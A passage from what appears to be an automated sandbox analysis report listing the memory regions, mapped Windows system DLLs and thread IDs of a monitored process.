"\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1666 start_va = 0x7ffbed0e0000 end_va = 0x7ffbed13afff monitored = 0 entry_point = 0x7ffbed0f38b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1667 start_va = 0x7ffbed620000 end_va = 0x7ffbed73bfff monitored = 0 entry_point = 0x7ffbed6602b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1668 start_va = 0x7ffbed820000 end_va = 0x7ffbed871fff monitored = 0 entry_point = 0x7ffbed82f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1669 start_va = 0x7ffbed140000 end_va = 0x7ffbed3bcfff monitored = 0 entry_point = 0x7ffbed214970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1670 start_va = 0x230aba40000 end_va = 0x230aba46fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000230aba40000" filename = "" Region: id = 1671 start_va = 0x7ffbea0d0000 end_va = 0x7ffbea139fff monitored = 0 entry_point = 0x7ffbea106d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1672 start_va = 0x7ffbe7f00000 end_va = 0x7ffbe7f09fff monitored = 0 entry_point = 0x7ffbe7f01350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1673 start_va = 0x230abc70000 end_va = 0x230abd1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000230abc70000" filename = "" Region: id = 1674 start_va = 0x230abaa0000 end_va = 0x230abaa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000230abaa0000" filename = "" Region: id = 1675 start_va = 0x230abab0000 end_va = 0x230abbaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000230abab0000" filename = "" Region: id = 1676 start_va = 0x230abc70000 end_va = 0x230abca8fff monitored = 0 entry_point = 0x230abc712f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1677 start_va = 0x230abd10000 end_va = 0x230abd1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000230abd10000" filename = "" Region: id = 1678 start_va = 0x230abd20000 end_va = 0x230abea7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000230abd20000" filename = "" Region: id = 1679 start_va = 0x7ffbed920000 end_va = 0x7ffbed95afff monitored = 0 entry_point = 0x7ffbed9212f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1680 start_va = 0x230abeb0000 end_va = 0x230ac030fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000230abeb0000" filename = "" Region: id = 1681 start_va = 0x230ac040000 end_va = 0x230ad43ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000230ac040000" filename = "" Region: id = 1682 start_va = 0x230abc70000 end_va = 0x230abc73fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "choice.exe.mui" filename = "\\Windows\\System32\\en-US\\choice.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\choice.exe.mui") Region: id = 1683 start_va = 0x230abc80000 end_va = 0x230abc80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000230abc80000" filename = "" Region: id = 1684 start_va = 0x230abc90000 end_va = 0x230abc90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000230abc90000" filename = "" Region: id = 1685 start_va = 0x230ad440000 end_va = 0x230ad776fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 92 os_tid = 0xf38 Thread: id = 93 os_tid = 0xf44